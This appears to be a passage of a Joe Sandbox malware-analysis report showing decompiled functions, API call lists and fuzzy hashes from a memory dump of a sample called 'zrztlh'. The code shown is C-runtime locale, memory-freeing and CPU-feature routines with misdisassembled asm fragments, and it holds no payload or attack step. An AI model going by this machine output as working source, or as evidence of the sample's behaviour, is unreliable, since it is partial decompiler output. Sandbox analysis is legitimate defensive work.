                • ___getlocaleinfo.LIBCMT ref: 00EB96F5
                • ___getlocaleinfo.LIBCMT ref: 00EB970C
                • ___getlocaleinfo.LIBCMT ref: 00EB9723
                • ___getlocaleinfo.LIBCMT ref: 00EB973D
                • ___getlocaleinfo.LIBCMT ref: 00EB9754
                • ___getlocaleinfo.LIBCMT ref: 00EB976B
                • ___getlocaleinfo.LIBCMT ref: 00EB9785
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                • String ID:
                • API String ID: 2187842456-0
                • Opcode ID: e3b57d8fdd040759e5965ee81e5fb9311759b06fcb6a17c9cdf6db9e33a1ee90
                • Instruction ID: 119438a1228bf96623d1cbdbd932c6f78f2b3f9b673c084a5cf924c451290bd3
                • Opcode Fuzzy Hash: e3b57d8fdd040759e5965ee81e5fb9311759b06fcb6a17c9cdf6db9e33a1ee90
                • Instruction Fuzzy Hash: 1EF1C7F7E412097AF72696E08C86FEBF7ECA704B40F145622F715F60C2FAA4665446A0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E00EA26FB(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                				intOrPtr _t86;
                				char _t153;
                				void* _t167;
                				void* _t180;
                				void* _t187;
                				char* _t193;
                				intOrPtr* _t196;
                				signed int _t199;
                				signed int _t200;
                				signed int _t201;
                				signed int _t202;
                				signed int _t203;
                				signed int _t204;
                				signed int _t205;
                				signed int _t206;
                				signed int _t207;
                				signed int _t208;
                				signed int _t209;
                				signed int _t210;
                				signed int _t211;
                				signed int _t212;
                				signed int _t213;
                				signed int _t214;
                				signed int _t215;
                				signed int _t216;
                				signed int _t217;
                				signed int _t218;
                				intOrPtr* _t219;
                				char* _t221;
                				void* _t222;
                				void* _t223;
                
                				_t180 = __ebx;
                				 *__eax =  *__eax + __eax;
                				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
                				asm("adc eax, 0xec458d57");
                				_push(1);
                				_push(__eax);
                				_t199 = E00EB4CB1(__ebx, __edi, __esi);
                				_t200 = _t199 | E00EB4CB1(__ebx, __edi, _t199, _t222 - 0x14, 1, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x10);
                				_t201 = _t200 | E00EB4CB1(__ebx, __edi, _t200, _t222 - 0x14, 1, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x14);
                				_t202 = _t201 | E00EB4CB1(__ebx, __edi, _t201, _t222 - 0x14, 1, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x18);
                				_t86 =  *((intOrPtr*)(_t222 + 8)) + 0x1c;
                				 *((intOrPtr*)(_t222 - 0xc)) = _t86;
                				_push(_t86);
                				_push(0x18);
                				asm("sbb [edi-0x73], dl");
                				_t223 = _t222 + 1;
                				asm("in al, dx");
                				_push(1);
                				_push(_t86);
                				_t203 = _t202 | E00EB4CB1(__ebx, __edi, _t202);
                				_t204 = _t203 | E00EB4CB1(__ebx, __edi, _t203, _t223 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t223 + 8)) + 0x20);
                				_t205 = _t204 | E00EB4CB1(__ebx, __edi, _t204, _t223 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t223 + 8)) + 0x24);
                				_t206 = _t205 | E00EB4CB1(__ebx, __edi, _t205, _t223 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t223 + 8)) + 0x28);
                				_t207 = _t206 | E00EB4CB1(__ebx, __edi, _t206, _t223 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t223 + 8)) + 0x29);
                				_t208 = _t207 | E00EB4CB1(__ebx, __edi, _t207, _t223 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t223 + 8)) + 0x2a);
                				_t209 = _t208 | E00EB4CB1(__ebx, __edi, _t208, _t223 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t223 + 8)) + 0x2b);
                				_t210 = _t209 | E00EB4CB1(__ebx, __edi, _t209, _t223 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t223 + 8)) + 0x2c);
                				_t211 = _t210 | E00EB4CB1(__ebx, __edi, _t210, _t223 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t223 + 8)) + 0x2d);
                				_t212 = _t211 | E00EB4CB1(__ebx, __edi, _t211, _t223 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t223 + 8)) + 0x2e);
                				_t213 = _t212 | E00EB4CB1(__ebx, __edi, _t212, _t223 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t223 + 8)) + 0x2f);
                				_t214 = _t213 | E00EB4CB1(__ebx, __edi, _t213, _t223 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t223 + 8)) + 0x38);
                				_t215 = _t214 | E00EB4CB1(__ebx, __edi, _t214, _t223 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t223 + 8)) + 0x3c);
                				_t216 = _t215 | E00EB4CB1(__ebx, __edi, _t215, _t223 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t223 + 8)) + 0x40);
                				_t217 = _t216 | E00EB4CB1(__ebx, __edi, _t216, _t223 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t223 + 8)) + 0x44);
                				_t218 = _t217 | E00EB4CB1(__ebx, __edi, _t217, _t223 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t223 + 8)) + 0x48);
                				if((E00EB4CB1(__ebx, __edi, _t218, _t223 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t223 + 8)) + 0x4c) | _t218) == 0) {
                					_t193 =  *((intOrPtr*)( *((intOrPtr*)(_t223 - 0xc))));
                					while( *_t193 != 0) {
                						_t153 =  *_t193;
                						if(_t153 < 0x30 || _t153 > 0x39) {
                							if(_t153 != 0x3b) {
                								goto L9;
                							} else {
                								_t221 = _t193;
                								do {
                									 *_t221 =  *((intOrPtr*)(_t221 + 1));
                									_t221 = _t221 + 1;
                								} while ( *_t221 != 0);
                								continue;
                							}
                							L18:
                							_t187 = 0xffffffffffffffff;
                							if( *((intOrPtr*)(_t180 + 0x80)) != 0) {
                								asm("lock xadd [edx], eax");
                							}
                							if( *((intOrPtr*)(_t180 + 0x78)) != 0) {
                								asm("lock xadd [eax], ecx");
                								if(_t187 == 1) {
                									E00EB2248( *((intOrPtr*)(_t180 + 0x84)));
                									E00EB2248( *((intOrPtr*)(_t180 + 0x78)));
                								}
                							}
                							 *((intOrPtr*)(_t180 + 0x78)) =  *((intOrPtr*)(_t223 - 4));
                							_t167 = 0;
                							 *((intOrPtr*)(_t180 + 0x80)) = _t196;
                							 *((intOrPtr*)(_t180 + 0x84)) = _t219;
                							goto L24;
                						} else {
                							 *_t193 = _t153 - 0x30;
                							L9:
                							_t193 = _t193 + 1;
                						}
                					}
                					_t219 =  *((intOrPtr*)(_t223 + 8));
                					_t196 =  *((intOrPtr*)(_t223 - 8));
                					 *_t219 =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84))));
                					 *((intOrPtr*)(_t219 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 4));
                					 *((intOrPtr*)(_t219 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 8));
                					 *((intOrPtr*)(_t219 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x30));
                					 *((intOrPtr*)(_t219 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x34));
                					 *((intOrPtr*)( *((intOrPtr*)(_t223 - 4)))) = 1;
                					if(_t196 != 0) {
                						 *_t196 = 1;
                					}
                					goto L18;
                				} else {
                					E00EB842D( *((intOrPtr*)(_t223 + 8)));
                					E00EB2248( *((intOrPtr*)(_t223 + 8)));
                					E00EB2248( *((intOrPtr*)(_t223 - 4)));
                					E00EB2248( *((intOrPtr*)(_t223 - 8)));
                					_t167 = 1;
                				}
                				L24:
                				return _t167;
                			}

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB85D9
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB85F0
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8607
                • ___getlocaleinfo.LIBCMT ref: 00EB861E
                • ___getlocaleinfo.LIBCMT ref: 00EB863B
                • ___getlocaleinfo.LIBCMT ref: 00EB8652
                • ___getlocaleinfo.LIBCMT ref: 00EB8669
                • ___getlocaleinfo.LIBCMT ref: 00EB8680
                • ___getlocaleinfo.LIBCMT ref: 00EB869A
                • ___getlocaleinfo.LIBCMT ref: 00EB86B1
                • ___getlocaleinfo.LIBCMT ref: 00EB86C8
                • ___getlocaleinfo.LIBCMT ref: 00EB86DF
                • ___getlocaleinfo.LIBCMT ref: 00EB86F9
                • ___getlocaleinfo.LIBCMT ref: 00EB8710
                • ___getlocaleinfo.LIBCMT ref: 00EB8727
                • ___getlocaleinfo.LIBCMT ref: 00EB873E
                • ___getlocaleinfo.LIBCMT ref: 00EB8758
                • ___getlocaleinfo.LIBCMT ref: 00EB876F
                • ___getlocaleinfo.LIBCMT ref: 00EB8786
                • ___getlocaleinfo.LIBCMT ref: 00EB879D
                • ___getlocaleinfo.LIBCMT ref: 00EB87B7
                • _free.LIBCMT ref: 00EB87CD
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB87D6
                • _free.LIBCMT ref: 00EB87DF
                • _free.LIBCMT ref: 00EB88A0
                • _free.LIBCMT ref: 00EB88A8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8448
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB845A
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB846C
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB847E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8490
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84A2
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84B4
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84C6
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84D8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84EA
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84FC
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB850E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8520
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ___getlocaleinfo_free$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                • String ID:
                • API String ID: 129311744-0
                • Opcode ID: e8807c014097cdb2faa6682f409b6bd3796282197e566080f324ed0dba5fe8c3
                • Instruction ID: 5e4805bc4c9095b39d420b9809d2b337096e8ce33fadad232659a6ba9724dcb7
                • Opcode Fuzzy Hash: e8807c014097cdb2faa6682f409b6bd3796282197e566080f324ed0dba5fe8c3
                • Instruction Fuzzy Hash: 8061E3B2D402087AEB20DBA8CC46FEF7BEC9B09B85F145510FB04FB1C2D5A4DA549A65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00EA67B8(void* __eax, void* __ebx, void* __edi, signed int __esi) {
                				char _t130;
                				void* _t144;
                				void* _t157;
                				void* _t162;
                				char* _t167;
                				intOrPtr* _t170;
                				signed int _t173;
                				signed int _t174;
                				signed int _t175;
                				signed int _t176;
                				signed int _t177;
                				signed int _t178;
                				signed int _t179;
                				signed int _t180;
                				signed int _t181;
                				signed int _t182;
                				signed int _t183;
                				signed int _t184;
                				signed int _t185;
                				signed int _t186;
                				signed int _t187;
                				signed int _t188;
                				intOrPtr* _t189;
                				char* _t191;
                				void* _t192;
                				void* _t193;
                
                				_t157 = __ebx;
                				asm("sbb [edi-0x73], dl");
                				_t193 = _t192 + 1;
                				asm("in al, dx");
                				_push(1);
                				_t173 = __esi | E00EB4CB1(__ebx, __edi, __esi);
                				_t174 = _t173 | E00EB4CB1(__ebx, __edi, _t173, _t193 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t193 + 8)) + 0x20);
                				_t175 = _t174 | E00EB4CB1(__ebx, __edi, _t174, _t193 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t193 + 8)) + 0x24);
                				_t176 = _t175 | E00EB4CB1(__ebx, __edi, _t175, _t193 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t193 + 8)) + 0x28);
                				_t177 = _t176 | E00EB4CB1(__ebx, __edi, _t176, _t193 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t193 + 8)) + 0x29);
                				_t178 = _t177 | E00EB4CB1(__ebx, __edi, _t177, _t193 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t193 + 8)) + 0x2a);
                				_t179 = _t178 | E00EB4CB1(__ebx, __edi, _t178, _t193 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t193 + 8)) + 0x2b);
                				_t180 = _t179 | E00EB4CB1(__ebx, __edi, _t179, _t193 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t193 + 8)) + 0x2c);
                				_t181 = _t180 | E00EB4CB1(__ebx, __edi, _t180, _t193 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t193 + 8)) + 0x2d);
                				_t182 = _t181 | E00EB4CB1(__ebx, __edi, _t181, _t193 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t193 + 8)) + 0x2e);
                				_t183 = _t182 | E00EB4CB1(__ebx, __edi, _t182, _t193 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t193 + 8)) + 0x2f);
                				_t184 = _t183 | E00EB4CB1(__ebx, __edi, _t183, _t193 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t193 + 8)) + 0x38);
                				_t185 = _t184 | E00EB4CB1(__ebx, __edi, _t184, _t193 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t193 + 8)) + 0x3c);
                				_t186 = _t185 | E00EB4CB1(__ebx, __edi, _t185, _t193 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t193 + 8)) + 0x40);
                				_t187 = _t186 | E00EB4CB1(__ebx, __edi, _t186, _t193 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t193 + 8)) + 0x44);
                				_t188 = _t187 | E00EB4CB1(__ebx, __edi, _t187, _t193 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t193 + 8)) + 0x48);
                				if((E00EB4CB1(__ebx, __edi, _t188, _t193 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t193 + 8)) + 0x4c) | _t188) == 0) {
                					_t167 =  *((intOrPtr*)( *((intOrPtr*)(_t193 - 0xc))));
                					while( *_t167 != 0) {
                						_t130 =  *_t167;
                						if(_t130 < 0x30 || _t130 > 0x39) {
                							if(_t130 != 0x3b) {
                								goto L8;
                							} else {
                								_t191 = _t167;
                								do {
                									 *_t191 =  *((intOrPtr*)(_t191 + 1));
                									_t191 = _t191 + 1;
                								} while ( *_t191 != 0);
                								continue;
                							}
                							L19:
                							if( *((intOrPtr*)(_t157 + 0x78)) != 0) {
                								asm("lock xadd [eax], ecx");
                								if(_t162 == 1) {
                									E00EB2248( *((intOrPtr*)(_t157 + 0x84)));
                									E00EB2248( *((intOrPtr*)(_t157 + 0x78)));
                								}
                							}
                							 *((intOrPtr*)(_t157 + 0x78)) =  *((intOrPtr*)(_t193 - 4));
                							_t144 = 0;
                							 *((intOrPtr*)(_t157 + 0x80)) = _t170;
                							 *((intOrPtr*)(_t157 + 0x84)) = _t189;
                							goto L23;
                						} else {
                							 *_t167 = _t130 - 0x30;
                							L8:
                							_t167 = _t167 + 1;
                						}
                					}
                					_t189 =  *((intOrPtr*)(_t193 + 8));
                					_t170 =  *((intOrPtr*)(_t193 - 8));
                					 *_t189 =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84))));
                					 *((intOrPtr*)(_t189 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 4));
                					 *((intOrPtr*)(_t189 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 8));
                					 *((intOrPtr*)(_t189 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 0x30));
                					 *((intOrPtr*)(_t189 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t157 + 0x84)) + 0x34));
                					 *((intOrPtr*)( *((intOrPtr*)(_t193 - 4)))) = 1;
                					if(_t170 != 0) {
                						 *_t170 = 1;
                					}
                					_t162 = 0xffffffffffffffff;
                					if( *((intOrPtr*)(_t157 + 0x80)) != 0) {
                						asm("lock xadd [edx], eax");
                					}
                					goto L19;
                				} else {
                					E00EB842D( *((intOrPtr*)(_t193 + 8)));
                					E00EB2248( *((intOrPtr*)(_t193 + 8)));
                					E00EB2248( *((intOrPtr*)(_t193 - 4)));
                					E00EB2248( *((intOrPtr*)(_t193 - 8)));
                					_t144 = 1;
                				}
                				L23:
                				return _t144;
                			}

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB863B
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB8652
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB8669
                • ___getlocaleinfo.LIBCMT ref: 00EB8680
                • ___getlocaleinfo.LIBCMT ref: 00EB869A
                • ___getlocaleinfo.LIBCMT ref: 00EB86B1
                • ___getlocaleinfo.LIBCMT ref: 00EB86C8
                • ___getlocaleinfo.LIBCMT ref: 00EB86DF
                • ___getlocaleinfo.LIBCMT ref: 00EB86F9
                • ___getlocaleinfo.LIBCMT ref: 00EB8710
                • ___getlocaleinfo.LIBCMT ref: 00EB8727
                • ___getlocaleinfo.LIBCMT ref: 00EB873E
                • ___getlocaleinfo.LIBCMT ref: 00EB8758
                • ___getlocaleinfo.LIBCMT ref: 00EB876F
                • ___getlocaleinfo.LIBCMT ref: 00EB8786
                • ___getlocaleinfo.LIBCMT ref: 00EB879D
                • ___getlocaleinfo.LIBCMT ref: 00EB87B7
                • _free.LIBCMT ref: 00EB87CD
                  • Part of subcall function 00EB2248: HeapFree.KERNEL32(00000000,00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB225C
                  • Part of subcall function 00EB2248: GetLastError.KERNEL32(00000000,?,00EB060D,00000000,?,00ECE000), ref: 00EB226E
                • _free.LIBCMT ref: 00EB87D6
                • _free.LIBCMT ref: 00EB87DF
                • _free.LIBCMT ref: 00EB88A0
                • _free.LIBCMT ref: 00EB88A8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8448
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB845A
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB846C
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB847E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8490
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84A2
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84B4
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84C6
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84D8
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84EA
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB84FC
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB850E
                  • Part of subcall function 00EB842D: _free.LIBCMT ref: 00EB8520
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: _free$___getlocaleinfo$InfoLocale___crt__calloc_crt$ErrorLast$FreeHeap__invoke_watson
                • String ID:
                • API String ID: 3394113687-0
                • Opcode ID: d240112f6bff3548c84ae91326eacca9f9051ac118192e7e34800d04bc19bc67
                • Instruction ID: 4e27bb8dbb8a41178c9b287f7ee973b7f07c85956efb9cb5f382097c7850fe64
                • Opcode Fuzzy Hash: d240112f6bff3548c84ae91326eacca9f9051ac118192e7e34800d04bc19bc67
                • Instruction Fuzzy Hash: 0051F3B2D401087AEB20DBA8CC46FEB7BEC9B09B85F145510FB04FB1C2D5A0DA509A65
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EBE8C3(short _a4, intOrPtr _a8) {
                				short _t13;
                				short _t28;
                
                				_t28 = _a4;
                				if(_t28 != 0 &&  *_t28 != 0 && E00EBDB28(_t28, ?str?) != 0) {
                					if(E00EBDB28(_t28, ?str?) != 0) {
                						return E00EBEFC5(_t28);
                					}
                					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                						L9:
                						return 0;
                					}
                					return _a4;
                				}
                				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                					goto L9;
                				}
                				_t13 = _a4;
                				if(_t13 == 0) {
                					return GetACP();
                				}
                				return _t13;
                			}






                APIs
                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00EBEB89,?,00000000), ref: 00EBE907
                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00EBEB89,?,00000000), ref: 00EBE931
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: InfoLocale
                • String ID: ACP$OCP
                • API String ID: 2299586839-711371036
                • Opcode ID: b4cb63a85889fdf2dfd0883e57899944b483b6d1a0fe0cde0f0eaeb73f6ba0ec
                • Instruction ID: bbd92ebf05956c3359fd9bc9f353d70a772304c51c54fc90144992672bc5ae30
                • Opcode Fuzzy Hash: b4cb63a85889fdf2dfd0883e57899944b483b6d1a0fe0cde0f0eaeb73f6ba0ec
                • Instruction Fuzzy Hash: D301B532208205BAEB509F15DC46FEB37DC9F44768F0054A5F909FA291E731EE85C791
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00EB1D88(struct _EXCEPTION_POINTERS* _a4) {
                
                				SetUnhandledExceptionFilter(0);
                				return UnhandledExceptionFilter(_a4);
                			}



                0x00eb1d8d
                0x00eb1d9d

                APIs
                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00EAEAB2,?,?,?,00000000), ref: 00EB1D8D
                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00EB1D96
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmp
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: 0312794fce4996316a88e5f992438d21feedb6d3b1ec70cff0f97cc26b54dacd
                • Instruction ID: fc03d86e289e27a429010c37a45b05536ad875fefc2fa51a54ef9de6c048e680
                • Opcode Fuzzy Hash: 0312794fce4996316a88e5f992438d21feedb6d3b1ec70cff0f97cc26b54dacd
                • Instruction Fuzzy Hash: 83B09231049208AFCB002B93EC09F4C3F28EB04652F0810A0FE4D540608B6354968E91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00EB00A3(intOrPtr __edx) {
                				signed int _v12;
                				signed int _v16;
                				signed int _v20;
                				signed int _v24;
                				signed char _v28;
                				signed int _v32;
                				intOrPtr _t40;
                				signed char _t41;
                				intOrPtr _t42;
                				intOrPtr* _t43;
                				signed int _t45;
                				intOrPtr _t57;
                				signed int _t58;
                				intOrPtr _t60;
                				intOrPtr* _t62;
                				signed int _t63;
                				signed int _t66;
                				signed int _t68;
                				signed int _t69;
                				signed int _t71;
                				signed int _t72;
                				intOrPtr* _t74;
                
                				_t60 = __edx;
                				 *0xecf1f0 =  *0xecf1f0 & 0x00000000;
                				 *0xece508 =  *0xece508 | 1;
                				if(IsProcessorFeaturePresent(0xa) == 0) {
                					L20:
                					return 0;
                				}
                				 *0xecf1f0 = 1;
                				asm("cpuid");
                				_t68 =  *0xece508; // 0x2f
                				_t62 =  &_v32;
                				_t69 = _t68 | 0x00000002;
                				 *_t62 = 0;
                				 *((intOrPtr*)(_t62 + 4)) = 1;
                				 *((intOrPtr*)(_t62 + 8)) = 0;
                				 *((intOrPtr*)(_t62 + 0xc)) = _t60;
                				_v16 = _v32;
                				 *0xece508 = _t69;
                				asm("sbb cl, cl");
                				_t40 = 1;
                				_t57 = 0;
                				asm("cpuid");
                				 *_t62 = _t40;
                				 *((intOrPtr*)(_t62 + 4)) = 1;
                				 *((intOrPtr*)(_t62 + 8)) = _t57;
                				 *((intOrPtr*)(_t62 + 0xc)) = _t60;
                				_t58 = _v24;
